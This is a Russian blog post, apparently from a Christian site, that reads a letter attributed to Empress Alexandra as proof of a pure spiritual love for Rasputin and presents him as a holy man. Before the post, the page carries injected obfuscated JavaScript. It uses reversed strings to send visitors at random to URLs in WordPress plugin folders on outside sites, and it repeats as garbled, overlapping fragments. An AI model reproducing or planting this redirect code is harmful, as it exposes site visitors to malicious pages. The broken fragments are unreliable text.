$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>
Мне сегодня написала одна женщина, прочитавшая мою публикацию письма императрицы Александры Федоровны к Григорию Ефимовичу. Если коротко, то ей кажется, что в отношениях между царицей и ГЕ есть нечто выходящее за рамки «приличных» отношений. Ведь и он, и она – семейные люди. Она, конечно, влюблена в него. Женщина, написавшая мне, призналась, что она не осуждает ее, так как понимает, так как тоже испытывает (или испытывала) подобные, как ей кажется, чувства.
Я понимаю, что все мы исходим в нашем прочтении, понимании всего происходящего вокруг нас – из нашего личного опыта. И этот опыт важен. Но каким бы богатым (или бедным, или тяжелым) ни был этот опыт, он все же ограничен. Но давайте еще раз глянем на это письмо государыни. Вот оно:
«Возлюбленный мой и незабвенный учитель, спаситель и наставник. Как томительно мне без тебя. Я только тогда душой покойна, отдыхаю, когда ты, учитель, сидишь около меня, а я целую твои руки и голову склоняю на твои блаженные плечи. О, как легко мне тогда бывает. Тогда я желаю все одного: заснуть, заснуть навеки на твоих плечах, в твоих объятьях. О, какое счастье даже чувствовать одно твое присутствие около меня. Где ты есть. Куда ты улетел. А мне так тяжело, такая тоска на сердце… Только ты, наставник мой возлюбленный, не говори Ане о моих страданиях без тебя. Аня добрая, она хорошая, она меня любит, но ты не открывай ей моего горя. Скоро ли ты будешь опять около меня. Скорее приезжай. Я жду тебя и мучаюсь по тебе. Прошу твоего святого благословения и целую твои блаженные руки. Во веки любящая тебя, Мама». (1909-1910 гг.)
Снова и снова перечитываю письмо государыни, и чем больше я читаю, тем больше понимаю, почему только женщины и у креста не боялись следовать за Ним. Они Его любили. Они не могли не любить Его и как мужчину. Его присутствие было для них счастьем. И они верили в Него. А потому Он был недоступен им как мужчина. И все их чувства обратились к Нему иначе — они любили Его и следовали за Ним. И не заигрывали с Ним.
И я думаю: как же важно для человека найти таких друзей, среди которых можно быть самим собою, с которыми хорошо. Ведь в присутствии Григория Ефимовича и государыня, и вся Семья – как будто просветлялись от радости. Почитайте письма царских детей к ГЕ. Современное мышление и их заподозрит в половой связи с ГЕ. Да и в ту пору пытались тень бросить. Ведь тогда уже задумали «извести» всю Семью. Но тогда люди еще не прониклись идеей того, что Распутин живет с царскими детьми. А вот с царицей… Григорий Ефимович — он помазанник. Он одного Духа со Христом. А государыня, хотя и грешница, как все люди, все же всегда была исключительно строгих правил, да даже будь она Марией Магдалиной — она любила Григория Ефимовича удивительной любовью. Чистой и доверчивой, как ее письма. Я иногда чувствую, или во сне мне это снится, что я сижу там, с ними, пью чай, и всем им, всем нам — так хорошо, и все мы понимаем друг друга, хотя нас — никто не понимает.
Вот бы каждому русскому человеку посидеть вечерок в той горнице, с Григорием Ефимовичем, с Семьей, попить чайку, и послушать, как говорит Григорий Ефимович о Том, Которого всем сердцем любит – о Боге. Я своей книгой, своими публикациями этого и добиваюсь – чтобы мы хотя бы мысленно перенеслись в ту атмосферу, которая опускалась на Семью в присутствии Григория Ефимовича. И чтобы потом, выйдя из этой комнаты, мы сохранили в душе память о ней и то умиление, которое в этой комнате находит.
Поделитесь своими мыслями ниже, в комментариях.
Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.
Мы в соцсетях
Солёное радио — Telegram, YouTube, ВКонтакте, Яндекс Дзен
«Новости христианства» — Telegtam, ВКонтакте
No Comments